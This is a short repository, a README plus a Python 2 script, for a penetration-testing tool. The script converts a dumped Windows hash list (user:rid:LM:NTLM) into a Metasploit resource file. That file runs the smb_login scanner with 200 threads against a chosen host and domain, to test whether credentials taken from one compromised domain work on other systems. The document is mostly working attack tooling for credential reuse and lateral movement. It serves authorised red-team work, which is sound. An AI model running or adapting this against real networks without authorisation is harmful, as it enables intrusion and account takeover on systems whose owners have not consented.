├── README.md └── hash_parser.py /README.md: -------------------------------------------------------------------------------- 1 | Quick Hash Parser / Comparer 2 | 3 | Written by: David Kennedy (ReL1K) @HackingDave from https://www.trustedsec.com 4 | 5 | This is a hash parser that will export a rc file compatible with Metasploit. This is useful when compromising a seperate domain and want to see if any of the credentials work on another domain or other systems. 6 | 7 | The first input is the filename that contains the hashes ex: Admin:500:LM:NTLM. 8 | The second input is the remote IP address you want to use smb_logins on to validate if the creds work. 9 | The third is the domain to attempt this on, leave this blank for workgroup 10 | 11 | Usage: python hash_parser.py 12 | -------------------------------------------------------------------------------- /hash_parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #################################################################################################### 3 | # 4 | # 5 | # Quick hash parser, will take a hashdump and put it into a Metasploit rc format. 6 | # 7 | # 8 | # Useful if you compromise a different domain and need to verify if any of the creds work. 9 | # 10 | # Will use the smb_logins to test to see if the hashes work properly. 11 | # 12 | # 13 | # Written by: David Kennedy (ReL1K) @HackingDave from https://www.trustedsec.com 14 | # 15 | # Version: 0.1a 16 | # 17 | #################################################################################################### 18 | import sys 19 | import os 20 | try: 21 | filename = sys.argv[1] 22 | if not os.path.isfile(filename): 23 | print "\n[!] Filename not found boss. Try again.\n" 24 | raise IndexError 25 | ipaddr = sys.argv[2] 26 | 27 | # if we want to specify a domain name 28 | try: 29 | domain = sys.argv[3] 30 | 31 | except IndexError: 32 | domain = "" 33 | 34 | except IndexError: 35 | print """Quick Hash Parser / Comparer 36 | 37 | Written by: David Kennedy (ReL1K) @HackingDave from https://www.trustedsec.com 38 | 39 | This is a hash parser that will export a rc file compatible with Metasploit. This is useful when compromising a separate domain and want to see if any of the credentials work on another domain or other systems. 40 | 41 | The first input is the filename that contains the hashes ex: Admin:500:LM:NTLM. 42 | The second input is the remote IP address you want to use smb_logins on to validate if the creds work. 43 | The third is the domain to attempt this on, leave this blank for workgroup 44 | 45 | Usage: python hash_parser.py 46 | """ 47 | sys.exit() 48 | 49 | # main parser 50 | def parser(filename,ipaddr,domain): 51 | 52 | # variable for holding parsed data for rc format 53 | resource = "use auxiliary/scanner/smb/smb_login\nset RHOSTS %s\nset SMBDomain %s\nset USERPASS_FILE msf_hashes_parsed.txt\nset THREADS 200\nexploit\n\n" % (ipaddr,domain) 54 | filewrite = file("msf_hashes.rc", "w") 55 | filewrite.write(resource) 56 | filewrite.close() 57 | 58 | fileopen = file(filename, "r").readlines() 59 | # overwrite old file and/or create a new file 60 | filewrite = file("msf_hashes_parsed.txt", "w") 61 | filewrite.write("") 62 | filewrite.close() 63 | 64 | # append to list 65 | filewrite = file("msf_hashes_parsed.txt", "a") 66 | for line in fileopen: 67 | line = line.rstrip() 68 | if ":" in line: 69 | # auxiliary/scanner/smb/smb_login 70 | # format is userid:rid:lm:ntlm 71 | line = line.split(":") 72 | filewrite.write(line[0] + " " + line[2] + ":" + line[3] + "\n") 73 | filewrite.close() 74 | 75 | print "[*] Parsing complete, rc file exported as msf_hashes.rc and hashes exported in smb_logins format as msf_hashes_parsed.txt" 76 | 77 | if __name__ == "__main__": 78 | parser(filename, ipaddr, domain) 79 | 80 | --------------------------------------------------------------------------------